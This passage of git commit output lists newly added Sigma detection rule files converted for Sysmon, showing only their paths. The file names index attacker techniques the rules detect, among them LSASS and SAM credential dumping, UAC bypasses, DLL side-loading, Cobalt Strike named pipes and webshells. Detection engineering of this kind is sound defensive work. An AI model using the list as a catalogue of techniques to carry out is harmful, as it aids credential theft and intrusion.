tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_notepad_plus_plus_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_ntds_dit_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_ntds_dit_uncommon_parent_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_ntds_dit_uncommon_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_ntds_exfil_tools.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_office_addin_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_office_macro_files_created.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_office_macro_files_downloaded.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_office_macro_files_from_susp_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_office_onenote_files_in_susp_locations.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_office_onenote_susp_dropped_files.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_office_outlook_macro_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_office_outlook_newform.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_office_outlook_susp_macro_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_office_publisher_files_in_susp_locations.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_office_startup_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_office_susp_file_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_office_uncommon_file_startup.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_pcre_net_temp_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_perflogs_susp_files.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_powershell_drop_binary_or_script.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_powershell_drop_powershell.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_powershell_exploit_scripts.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_powershell_module_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_powershell_module_susp_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_powershell_module_uncommon_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_powershell_startup_shortcuts.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_ps_script_policy_test_creation_by_uncommon_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_rclone_config_files.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_rdp_file_susp_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_redmimicry_winnti_filedrop.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_remcom_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_remote_access_tools_screenconnect_artefact.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_remote_access_tools_screenconnect_remote_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_ripzip_attack.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_sam_dump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_shell_write_susp_directory.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_shell_write_susp_files_extensions.yml 
create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_startup_folder_file_write.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_colorcpl.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_creation_by_mobsync.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_default_gpo_dir_write.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_desktop_ini.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_desktop_txt.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_diagcab.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_double_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_exchange_aspx_write.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_executable_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_get_variable.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_hidden_dir_index_allocation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_homoglyph_filename.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_archive.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_exe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_legitimate_app_dropping_script.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_lnk_double_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_pfx_file_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_powershell_profile.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_recycle_bin_fake_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_startup_folder_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_system_interactive_powershell.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_task_write.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_teamviewer_remote_session.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_vscode_powershell_profile.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_windows_terminal_profile.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_susp_winsxs_binary_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_sysinternals_livekd_default_dump_name.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_sysinternals_livekd_driver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_sysinternals_livekd_driver_susp_creation.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_sysinternals_procexp_driver_susp_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_sysinternals_procmon_driver_susp_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_sysinternals_psexec_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_sysinternals_psexec_service_key.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_taskmgr_lsass_dump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_tsclient_filewrite_startup.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_uac_bypass_eventvwr.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_uac_bypass_ieinstal.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_uac_bypass_winsat.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_uac_bypass_wmp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_vhd_download_via_browsers.yml create mode 
100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_vscode_tunnel_remote_creation_artefacts.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_vscode_tunnel_renamed_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_webshell_creation_detect.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_werfault_dll_hijacking.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_winrm_awl_bypass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_wmi_persistence_script_event_consumer_write.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_wmiexec_default_filename.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_wmiprvse_wbemcomn_dll_hijack.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_wpbbin_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/file/file_event/file_event_win_writing_local_admin_share.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_cmstp_load_dll_from_susp_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_amsi_suspicious_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_azure_microsoft_account_token_provider_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_credui_uncommon_process_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_dbghelp_dbgcore_susp_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_dbghelp_dbgcore_unsigned_load.yml create 
mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_pcre_dotnet_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_rstrtmgr_suspicious_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_rstrtmgr_uncommon_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_sdiageng_load_by_msdt.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_system_management_automation_susp_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_tttracer_module_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_vss_ps_susp_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_vssapi_susp_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_dll_vsstrace_susp_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_hktl_sharpevtmute.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_hktl_silenttrinity_stager.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_iexplore_dcom_iertutil_dll_hijack.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_lsass_unsigned_image_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_office_dotnet_assembly_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_office_dotnet_clr_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_office_dotnet_gac_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_office_dsparse_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_office_excel_xll_susp_load.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/image_load/image_load_office_kerberos_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_office_outlook_outlvba_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_office_powershell_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_office_vbadll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_rundll32_remote_share_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_scrcons_wmi_scripteventconsumer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_7za.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_abused_dlls_susp_paths.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_antivirus.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_appverifui.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_aruba_networks_virtual_intranet_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_avkkid.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_ccleaner_du.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_ccleaner_reactivator.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_chrome_frame_helper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_classicexplorer32.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_comctl32.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_coregen.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_cpl_from_non_system_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_dbgcore_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_dbghelp_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_eacore.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_edputil.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_from_non_system_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_goopdate.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_gup_libcurl.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_iviewers.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_jsschhlp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_libvlc.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_mfdetours.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_mfdetours_unsigned.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_non_existent_dlls.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_office_dlls.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_rcdll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_rjvplatform_default_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_rjvplatform_non_default_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_robform.yml create mode 
100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_shell_chrome_api.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_shelldispatch.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_smadhook.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_solidpdfcreator.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_third_party.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_ualapi.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_vivaldi_elf.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_vmguestlib.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_vmmap_dbghelp_signed.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_vmmap_dbghelp_unsigned.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_vmware_xfer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_waveedit.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_wazuh.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_windows_defender.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_side_load_wwlib.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_spoolsv_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_susp_clickonce_unsigned_module_loaded.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_susp_dll_load_system_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_susp_python_image_load.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/image_load/image_load_susp_script_dotnet_clr_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_susp_uncommon_image_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_thor_unsigned_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_uac_bypass_iscsicpl.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_uac_bypass_via_dism.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_wmi_persistence_commandline_event_consumer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml create mode 100644 tools/sigmac/converted_rules/sysmon/image_load/image_load_wsman_provider_image_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_addinutil.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_binary_susp_com.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_certutil_initiated_connection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_crypto_mining_pools.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_dead_drop_resolvers.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_devtunnel_connection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_dfsvc_uncommon_ports.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_dllhost_net_connections.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_eqnedt.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_excel_outbound_network_connection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_google_api_non_browser_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_hh.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_imewdbld.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_mega_nz.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_msiexec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_ngrok_domains.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_ngrok_tunnel.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_notepad_network_connection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_notion_api_susp_communication.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_office_susp_ports.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_powershell_network_connection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_python.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_rdp_outbound_over_non_standard_tools.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_rdp_reverse_tunnel.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_rdp_to_http.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_reddit_api_non_browser_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_regsvr32_network_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_remote_powershell_session_network.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_rundll32_net_connections.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_script.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_script_wan.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_susp_binary_no_cmdline.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_susp_cmstp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_susp_dropbox_api.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_susp_epmap.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_susp_external_ip_lookup.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_susp_malware_callback_port.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_susp_malware_callback_ports_uncommon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_susp_outbound_smtp_connections.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_susp_prog_location_network_connection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_telegram_api_non_browser_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_vscode_tunnel_connection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_winlogon_net_connections.yml create mode 100644 tools/sigmac/converted_rules/sysmon/network_connection/net_connection_win_wuauclt_network_connection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_adfs_namedpipe_connection_uncommon_tool.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_hktl_cobaltstrike.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_hktl_cobaltstrike_re.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_hktl_coercedpotato.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_hktl_diagtrack_eop.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_hktl_efspotato.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_hktl_generic_cred_dump_tools_pipes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_hktl_koh_default_pipe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_powershell_alternate_host_pipe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_powershell_execution_pipe.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_pua_csexec_default_pipe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_pua_paexec_default_pipe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_pua_remcom_default_pipe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_scrcons_wmi_consumer_namedpipe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_susp_malicious_namedpipes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/pipe_created/pipe_created_sysinternals_psexec_default_pipe_susp_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/placeholder/process_creation/proc_creation_win_userdomain_variable_enumeration.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_cmstp_execution_by_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_hktl_cobaltstrike_bof_injection_pattern.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_hktl_generic_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_hktl_handlekatz_lsass_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_hktl_littlecorporal_generated_maldoc.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_hktl_sysmonente.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_lsass_dump_keyword_image.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_lsass_memdump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_lsass_python_based_tool.yml create mode 100644 
tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_lsass_remote_access_trough_winrm.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_lsass_seclogon_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_lsass_susp_access_flag.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_lsass_werfault.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_lsass_whitelisted_process_names.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_susp_direct_ntopenprocess_call.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_susp_invoke_patchingapi.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_susp_shellcode_injection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_svchost_credential_dumping.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_svchost_susp_access_request.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_uac_bypass_editionupgrademanagerobj.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_access/proc_access_win_uac_bypass_wow64_logger.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_7zip_password_compression.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_7zip_password_extraction.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml create mode 
100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_addinutil_uncommon_dir_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_adplus_memory_dump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_agentexecutor_susp_usage.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_at_interactive_execution.yml create mode 100644 